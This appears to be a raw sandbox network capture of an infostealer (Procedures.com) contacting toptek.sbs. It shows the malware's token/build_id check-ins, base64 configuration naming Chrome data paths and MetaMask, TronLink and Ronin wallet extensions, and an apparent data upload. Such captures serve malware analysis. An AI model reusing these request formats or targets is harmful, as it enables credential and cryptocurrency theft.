                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:46 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----E3WBAIWTRQIM7Q9000ZC
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 33 57 42 41 49 57 54 52 51 49 4d 37 51 39 30 30 30 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 33 57 42 41 49 57 54 52 51 49 4d 37 51 39 30 30 30 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 45 33 57 42 41 49 57 54 52 51 49 4d 37 51 39 30 30 30 5a 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------E3WBAIWTRQIM7Q9000ZCContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------E3WBAIWTRQIM7Q9000ZCContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------E3WBAIWTRQIM7Q9000ZCCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:47 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:47 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  4192.168.2.54976794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:48 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----T2DB1DBIMOZU3EU3O890
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------T2DB1DBIMOZU3EU3O890Cont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:49 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:49 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  5192.168.2.54977294.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:51 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----NGVKFKFKXLNYM7GV37Q9
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:51 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 47 56 4b 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 4b 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 4b 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------NGVKFKFKXLNYM7GV37Q9Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------NGVKFKFKXLNYM7GV37Q9Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------NGVKFKFKXLNYM7GV37Q9Cont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:51 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:52 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  6192.168.2.54977894.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:53 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 7857
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:53 UTC7857OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:54 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  7192.168.2.54978094.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:54 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:54 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:55 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  8192.168.2.549790142.250.181.1324436152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:57 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:58 GMT
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-040S8xGI7tCFU5tdwfhU8g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC124INData Raw: 38 66 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 75 66 63 20 6e 65 77 73 22 2c 22 62 65 73 74 20 63 68 72 69 73 74 6d 61 73 20 6d 6f 76 69 65 73 22 2c 22 66 6f 72 74 6e 69 74 65 20 63 79 62 65 72 70 75 6e 6b 20 32 30 37 37 20 73 6b 69 6e 73 22 2c 22 62 69 74 63 6f 69 6e 20 70 72 69 63 65 22 2c 22 6e 61 73 61 20 61 73 74 72 6f 6e 61 75 74 73 20 73 74 75 63 6b 22 2c 22 6d
                                                                                                                                                                                                                                                                                                  Data Ascii: 8f7)]}'["",["ufc news","best christmas movies","fortnite cyberpunk 2077 skins","bitcoin price","nasa astronauts stuck","m
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC1390INData Raw: 61 72 76 65 6c 20 72 69 76 61 6c 73 20 68 65 72 6f 65 73 20 74 69 65 72 20 6c 69 73 74 22 2c 22 6e 61 72 61 79 61 6e 61 20 6d 75 72 74 68 79 22 2c 22 63 68 72 69 73 74 6d 61 73 20 74 72 61 76 65 6c 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a 6c 22
                                                                                                                                                                                                                                                                                                  Data Ascii: arvel rivals heroes tier list","narayana murthy","christmas travel weather forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl"
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC788INData Raw: 53 56 4e 52 54 31 55 30 56 56 56 72 62 6d 31 53 4e 45 4e 6f 5a 6d 6b 78 61 6e 52 49 61 57 6c 56 65 46 52 4c 55 58 4e 72 56 47 4a 51 53 47 74 6c 55 46 52 78 54 6d 6f 30 56 6c 4a 30 61 57 64 30 59 6d 68 70 65 46 5a 73 51 6a 56 49 52 7a 4a 51 64 6a 5a 57 62 48 52 55 61 53 39 78 4f 44 42 46 64 32 4d 79 4f 54 56 48 64 6b 52 47 55 45 68 7a 65 55 52 35 55 48 68 45 62 32 52 78 53 54 6c 32 53 6b 56 31 53 7a 68 72 52 32 46 4c 4d 6d 74 56 51 31 42 69 4e 6c 5a 5a 61 47 52 42 62 58 68 42 63 6b 51 79 4d 6e 4e 36 55 57 6b 31 61 32 35 70 61 54 64 70 4d 31 6c 78 63 6e 4e 48 53 6d 4e 6e 4e 48 70 72 51 54 68 36 62 6e 64 78 4e 58 42 6d 59 55 4e 44 4b 31 56 53 55 31 46 74 52 31 55 33 53 56 42 71 4f 55 39 31 65 44 4a 76 4e 58 4a 5a 59 32 31 57 54 48 45 7a 51 57 78 68 4e 56 6c
                                                                                                                                                                                                                                                                                                  Data Ascii: SVNRT1U0VVVrbm1SNENoZmkxanRIaWlVeFRLUXNrVGJQSGtlUFRxTmo0VlJ0aWd0YmhpeFZsQjVIRzJQdjZWbHRUaS9xODBFd2MyOTVHdkRGUEhzeUR5UHhEb2RxSTl2SkV1SzhrR2FLMmtVQ1BiNlZZaGRBbXhBckQyMnN6UWk1a25paTdpM1lxcnNHSmNnNHprQTh6bndxNXBmYUNDK1VSU1FtR1U3SVBqOU91eDJvNXJZY21WTHEzQWxhNVl
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC91INData Raw: 35 35 0d 0a 31 6a 63 57 74 6b 62 6b 78 70 57 6e 70 4a 65 6e 55 33 63 31 4e 54 56 32 52 70 65 45 6f 32 61 7a 67 32 64 46 63 79 57 6b 30 77 62 6b 4a 51 61 31 46 50 62 31 67 34 61 31 4e 70 4e 48 5a 79 63 54 52 34 4e 48 5a 4d 64 7a 55 72 55 7a 52 47 54 32 68 36 54 55 46 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 551jcWtkbkxpWnpJenU3c1NTV2RpeEo2azg2dFcyWk0wbkJQa1FPb1g4a1NpNHZycTR4NHZMdzUrUzRGT2h6TUF
